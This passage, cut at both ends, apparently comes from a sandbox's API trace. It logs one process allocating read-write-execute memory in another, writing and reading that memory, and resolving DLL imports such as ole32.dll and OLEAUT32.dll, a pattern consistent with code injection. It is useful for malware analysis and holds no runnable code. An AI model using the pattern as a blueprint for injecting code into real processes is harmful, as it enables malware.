BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.790] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.790] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.790] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.790] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.791] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.797] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.797] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.797] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.797] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20027, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.797] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.797] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.797] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949d4a*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949d4a*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.798] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.798] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.798] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.798] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.798] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.798] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.798] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.799] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.799] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.799] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.799] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.799] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.800] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.800] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949d92, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="ole32.dll") returned 10 [0140.800] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.800] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x13) returned 0x0 [0140.800] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.800] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.801] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.801] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.801] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.801] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.801] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.804] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.804] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.805] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.805] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.805] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.805] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.805] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949d82*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949d82*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.805] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.805] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.806] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.806] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.806] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.806] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.806] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.807] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.807] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.807] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.807] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.807] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.807] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a430, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.807] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.808] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949d6a*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949d6a*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0140.808] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.808] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.808] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.808] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.809] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.809] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.809] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.809] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.809] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.809] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.809] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.810] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.810] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a438, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.810] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949d9c, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="OLEAUT32.dll") returned 13 [0140.810] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.810] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x19) returned 0x0 [0140.810] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.810] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.811] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.811] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.811] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.811] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.811] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.813] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.813] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.813] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.814] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20029, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.814] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.814] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0140.814] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.814] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.814] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.815] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.815] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.815] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.815] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.815] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.816] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.816] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.816] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.816] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.816] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0140.816] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.817] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.817] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.817] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.817] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.817] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.817] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.818] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.818] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.818] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.818] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.818] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.818] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0140.818] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.819] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.819] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.819] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.819] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.819] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.907] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.907] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.907] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, 